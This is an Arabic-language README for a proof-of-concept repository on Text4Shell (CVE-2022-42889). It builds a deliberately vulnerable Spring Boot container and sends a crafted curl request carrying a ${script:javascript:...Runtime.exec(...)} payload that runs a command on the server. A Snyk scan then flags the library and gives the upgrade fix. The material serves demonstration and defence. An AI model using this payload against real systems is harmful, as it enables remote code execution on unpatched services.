
CVE-2022-42889 (المعروف أيضًا باسم Text4Shell) إثبات المفهوم لـ RCE

Text4Shell هو الاسم الشائع لثغرة برمجية حرجة تم اكتشافها في مكتبة Apache Commons Text (انظر CVE-2022-42889).
يهدف هذا المستودع إلى توضيح تنفيذ التعليمات البرمجية عن بُعد (RCE) يستغل هذه الثغرة (CVE).
يتم استخدام الكود القابل للاستغلال في وحدة تحكم SpringBoot، لكن لا تخلط بين الأمور، فهذه ليست مشكلة أمان SpringBoot/Spring.
قبل اختبار RCE، قم ببناء صورة Docker:
$ docker build -t text4shell .
...
=> exporting to image 0.0s
=> => exporting layers 0.0s
=> => writing image sha256:5d82feaa030f5e7b35c1c6deaa12b40ef713c05001a41f5f71fff6174513507f 0.0s
=> => naming to docker.io/library/text4shell
ثم شغّل الحاوية:
$ docker run --name text4shell --rm -ti -p:8080:8080 text4shell
...
2022-11-05 09:11:03.798 INFO 1 --- [ main] it.sunnyvale.text4shell.Main : Started Main in 1.376 seconds (JVM running for 1.713)
يمكنك أخيرًا محاولة استغلال التطبيق القابل للاستغلال باستخدام عنوان URL مُصمم خصيصًا:
$ curl http://localhost:8080/text4shell/attack\?search\=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Fp0wned%27%29%7D
Search results for: ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/p0wned')}%
إذا وجدت ملفًا باسم p0wned في مجلد /tmp داخل الحاوية، فهذا يعني أن RCE تم تنفيذه بنجاح.
$ docker exec text4shell ls -l /tmp/p0wned
-rw-r--r-- 1 root root 0 Nov 5 09:17 /tmp/p0wned
عند فحص الصورة باستخدام Snyk، يتم اكتشاف المكتبة القابلة للاستغلال:
$ docker scan text4shell | grep text
Testing text4shell...
Project name: docker-image|text4shell
Docker image: text4shell
Testing text4shell...
Upgrade org.apache.commons:[email protected] to org.apache.commons:[email protected] to fix
✗ Arbitrary Code Execution (new) [High Severity][https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHECOMMONS-3043138] in org.apache.commons:[email protected]
introduced by org.apache.commons:[email protected]
Upgrade org.springframework:[email protected] to org.springframework:[email protected] to fix
✗ Improper Handling of Case Sensitivity [Low Severity][https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634] in org.springframework:[email protected]
introduced by org.springframework:[email protected]
Project name: text4shell:latest:/app
Docker image: text4shell